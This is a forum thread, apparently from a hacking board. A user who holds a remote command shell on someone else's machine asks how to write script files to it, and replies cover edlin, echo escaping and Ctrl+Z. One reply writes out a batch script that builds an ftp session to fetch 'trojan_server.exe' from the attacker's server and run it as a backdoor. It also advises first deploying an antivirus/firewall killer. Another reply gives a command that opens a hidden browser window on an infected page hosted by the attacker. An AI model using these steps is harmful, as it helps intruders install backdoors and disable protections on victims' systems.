Problem : A Client who got a remote cmd shell wants to save a file that contains many special characters , and file transfer is not allowed using ftp or tftp or net share , the only solution is echo or copy con or any command line command i dunno.

Problem with Echoing : Echo doesnt allow some characters (for example more than two " will mess up the whole thing up.

Problem with Copy Con : When using copy con locally , u write copy con c:\file.txt then u write what u wanna write then u press F6 button then enter.
When using it remotely , pressing F6 button won't send the same command that is sent locally so the file cant be ended, Any solution on how to send the F6 key remotely ?

Any help on how to use any other way to write files , so i can send my favoraite vbs, hta or any other text file (please guys don't mention tools to download to server because i dont have a way to do that)

Thankz

well ctrl+Z probably won't work remotely , it works only locally , same as F6 , any more suggestions , and i didnt try edlin.exe , edlin seems to be a good idea , i will try it thanks , and why dont u understand me , im talking about how to write files with cmd shell ...

dunno exactly what you want, but try alt+26. this will emulate the F6 button

you can use edlin.exe to write files.

ctrl z maybe. Never tried it from a remote shell, but it works locally.

wouldn't it be possible to use telnet ?

something like

telnet ip port >> software.exe

and on the remote side send the file when a connection is made?

Ctrl+Z works fine for me!!!

i can't see why you need this anyway...
when you get a shell in a remote system do the following...
---------------------------------
@echo off
echo your.server.com 21>z
echo username_on_ftp>>z
echo password>>z
echo BINARY>>z
echo get trojan_server.exe>>z
echo quit>>z
ftp -i -s:z
start trojan_server.exe
---------------------------------

now you have other future backdoor....

----------------------------------

if there is an antivirus or firewall,
or you don't know...
repeat the method twice...
first for an AV/FW killer and then for your trojan....
(there are many undetectable AV/FW killers on google or in downloads section...)
-----------------------------------------------------------------------------------------

well if ftp method is not working and tftp is not working and net share isnt working , i wanna write my vbs on my cmd shell , thats what i wanna do , is it possible

there's no need to do that...
always ftp works...
and if not then you can make a vbs html and upload it on a server...
then do on remote:
start cmd /k "iexplore.exe http://ur.server.com/folder/virii-infected.htm",0
that 'll open explorer but nothin' will be shown...

raptor i think your missing the point. he WANTS to write it in the shell. thats not saying your ways aren't more effective, its just what he wqnts to do.

boshcash i not getting why you can't use echo or edlin. echo fails on long strings of special chars but edlin will handle 256.

C:\>echo """""""" >>my.txt

C:\>type my.txt
""""""""

C:\>edlin my.txt
End of input file
*#I
2:*"""""""""""""""""""""""""""""
3:*!@#$$%%^&*(())_+++==="""""""""""""""""
4:*^C

*E

C:\>type my.txt
""""""""
"""""""""""""""""""""""""""""
!@#$$%%^&*(())_+++==="""""""""""""""""

why don't you try edit ??? (dos notepad...)

guys u still dont get the point , the remote cmd shell doesnt allow ctrl+c try and see , i will try that iexplore way but where would it download the file any other wayz ?

email.

-ed.

you could trai a other shell..

well i had a solution to that problem by echoing , ^(char) to echo a special char , echo line1 >> file.txt , echo line2 >> file.txt to make another line thanks guys anyway ..

It may be possible to use unicede of Ctrl+Z
I didn't test it